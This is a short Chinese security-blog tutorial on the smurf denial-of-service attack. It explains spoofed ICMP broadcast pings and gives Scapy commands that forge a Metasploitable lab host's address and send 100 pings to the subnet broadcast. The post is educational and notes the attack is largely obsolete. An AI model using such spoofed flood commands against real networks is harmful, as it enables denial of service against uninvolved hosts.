拒绝服务——smurf
smurf
-
世界上最古老的DDoS攻击
-
向广播地址发送伪造源地址的 ICMP echo Request (ping)包
-
局域网内攻击者向网络广播地址发送ICMP包,并将回复地址设置成受害网络的广播地址,通过ICMP应答请求数据包来淹没受害主机
-
对现代操作系统几乎无效(不响应目标为广播的ping)
服务器metasploitable
IP:192.168.1.119
攻击者kali
scapy> i=IP()> i.display()> i.src="192.168.1.119"> i.dst="192.168.1.255"> p=ICMP()> p.display()> r=send(i/p)# 使用一行发送:send(IP(dst="192.168.1.255",src="192.168.1.119")/ICMP(),count=100,verbose=1)123456789
结语
这个主要是了解下 毕竟没有实用性了
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。
© Honker Security Commando
原文始发于微信公众号(中龙 红客突击队):拒绝服务——smurf
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论